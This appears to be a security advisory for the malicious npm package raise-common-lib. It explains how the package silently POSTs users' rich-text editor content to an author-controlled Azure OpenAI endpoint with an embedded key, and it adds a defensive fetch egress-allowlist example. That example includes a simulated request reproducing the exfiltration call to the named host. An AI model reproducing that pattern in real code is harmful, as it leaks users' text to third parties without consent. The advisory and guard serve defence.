Malicious package

raise-common-lib (npm)

Malicious code in raise-common-lib (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-4656
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall raise-common-lib

What this malware does

The package's rich-text editor module hardcodes an Azure OpenAI endpoint (https://aidevused.openai.azure.com/) and an api-key in esm2015/lib/form/richtexteditor/ai-config.js (and again in the UMD bundle bundles/raise-common-lib.umd.js, around lines 38398-38416). When a consuming application invokes the editor's AI features (Rephrase / Grammar / Summarize / Translate / SentimentAnalysis, via OpenAiModelRTE, getAzureChatAIRequest and getAzureTextAIRequest), the user-supplied text is POSTed with fetch to that endpoint, with the embedded key sent in the api-key header. Neither the installer nor the consuming application's end user can change the destination, so every piece of text passed through the AI editor actions is routed to a third-party Azure account controlled by the package author. Two consequences follow for anyone who installs the package:

(1) editor content supplied by the caller is silently relayed to an account the installer never agreed to send data to, and
(2) the embedded Azure OpenAI api-key ships in every consumer bundle, so anyone who installs the package can extract the key and use it against that Azure resource (consuming quota, running up the owner's bill, or impersonating that account when querying its logs).
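The behaviour above (a dependency POSTing caller data to a fixed, non-configurable host) is exactly what an application-level egress allowlist on fetch is meant to stop. The following is an added example, not code from the advisory or from the package: it wraps whatever fetch implementation the application uses, refuses requests to hosts outside the allowlist, and records only the target host and body length in an audit log, never the body. The simulated library call reproduces the pattern described above; the endpoint host is the one named in this advisory, while the deployment path, the api-key value and the allowlisted host are placeholders.

```javascript
// Added example: egress allowlist around fetch(). Not part of the advisory or of
// raise-common-lib. The check and the audit entry happen synchronously, before any
// network call is issued.
function createFetchGuard(allowedHosts, underlyingFetch) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const audit = [];

  function hostOf(input) {
    const url = typeof input === "string" ? input : input.url;
    return new URL(url).host.toLowerCase();
  }

  function guardedFetch(input, init = {}) {
    const host = hostOf(input);
    const method = init.method || "GET";
    const bodyLength = typeof init.body === "string" ? init.body.length : 0;
    if (!allowed.has(host)) {
      // Record the attempt (destination and size only) and refuse to send it.
      audit.push({ host, method, bodyLength, blocked: true });
      throw new Error(`egress blocked: ${host} is not an allowed destination`);
    }
    audit.push({ host, method, bodyLength, blocked: false });
    return underlyingFetch(input, init);
  }

  return { fetch: guardedFetch, audit };
}

// Constructed stand-in for the library's AI request: user text is POSTed to a fixed
// Azure OpenAI endpoint with an embedded api-key header. The host is from the
// advisory; "example" deployment path and PLACEHOLDER_KEY are assumptions.
async function simulatedAiRequest(fetchImpl, text) {
  const res = await fetchImpl(
    "https://aidevused.openai.azure.com/openai/deployments/example/chat/completions",
    {
      method: "POST",
      headers: { "Content-Type": "application/json", "api-key": "PLACEHOLDER_KEY" },
      body: JSON.stringify({ messages: [{ role: "user", content: text }] }),
    }
  );
  return res.json();
}

// Runs the simulated call through a guard that allows only an internal API host
// (assumed name) and reports whether the request was stopped.
async function demo() {
  const fakeNetwork = async () => ({ json: async () => ({ ok: true }) });
  const guard = createFetchGuard(["api.example.internal"], fakeNetwork);
  let blocked = false;
  try {
    await simulatedAiRequest(guard.fetch, "confidential draft text");
  } catch (e) {
    blocked = /egress blocked/.test(e.message);
  }
  return { blocked, audit: guard.audit };
}

if (typeof require !== "undefined" && require.main === module) {
  demo().then((r) => console.log(JSON.stringify(r, null, 2)));
}
```

In a browser build the same guard can be installed by assigning `window.fetch = createFetchGuard([...], window.fetch).fetch` before any third-party module loads; in Node, `globalThis.fetch` likewise. The guard does not cover XMLHttpRequest or WebSocket, so treat it as one layer next to a Content-Security-Policy connect-src directive and network egress controls, not a replacement for removing the package.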

Malicious versions

1 flagged
0.0.249

Indicators of compromise (SHA-256)

7401fb7c3259e43181ef51ca47b984450f7a849fed5a9598e6131b4c0ed5d2bb
f84ed2293c6484ef4554a87e1f613008555a222ebfa2b3a2e25500cbea92826f

Frequently asked questions

raise-common-lib on npm has been identified as a malicious package (version 0.0.249 flagged) and is not safe to use. Remove it immediately; do not install it or keep it in your dependency tree.

Campaign

IN-MAL-2026-004615
IN-MAL-2026-006082

Credits

  • Amazon Inspector · finder

raise-common-lib (npm) malicious package — MAL-2026-4656 | O3 Security